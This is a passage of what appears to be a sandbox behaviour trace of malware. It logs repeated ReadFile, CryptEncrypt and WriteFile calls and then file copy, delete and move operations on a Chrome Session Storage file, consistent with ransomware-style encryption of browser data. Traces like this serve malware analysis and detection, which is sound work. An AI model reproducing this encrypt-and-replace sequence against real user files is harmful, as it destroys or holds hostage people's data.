lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.401] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.402] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.402] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.402] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.402] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.402] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.402] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.402] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.402] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.402] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.402] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.402] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.402] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.402] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.402] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.402] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.402] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.402] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.403] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.405] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.405] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.405] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.405] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.405] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.405] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.405] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.405] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.405] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.405] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.405] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.405] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.405] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.406] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.406] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.406] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.406] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.406] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.406] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.406] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.406] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.406] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.406] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.406] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.406] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.406] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.406] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.406] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.407] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.407] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.407] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.407] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.407] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.407] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.407] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.407] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.407] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.407] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.407] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.407] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.407] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.407] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.407] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.407] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.407] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.408] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.408] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.408] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.408] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.408] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.408] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.408] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.408] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.408] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.408] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.408] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.408] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.408] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.408] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.408] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.408] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.408] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.408] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.408] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.408] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.409] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.409] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.409] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.409] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.409] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.409] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.409] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.409] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.409] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.409] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x33f, lpOverlapped=0x0) returned 1 [0265.409] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x33f, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x340) returned 1 [0265.409] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x340, lpOverlapped=0x0) returned 1 [0265.409] CloseHandle (hObject=0x5d40) returned 1 [0265.409] CloseHandle (hObject=0x5d4c) returned 1 [0265.409] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Session Storage\\000003.ldb.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\session storage\\000003.ldb.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Session Storage\\000003.ldb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\session storage\\000003.ldb"), bFailIfExists=0) returned 1 [0265.413] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Session Storage\\000003.ldb", dwFileAttributes=0x0) returned 1 [0265.414] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Session Storage\\000003.ldb.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\session storage\\000003.ldb.gsg")) returned 1 [0265.415] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Session Storage\\000003.ldb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\session storage\\000003.ldb"), 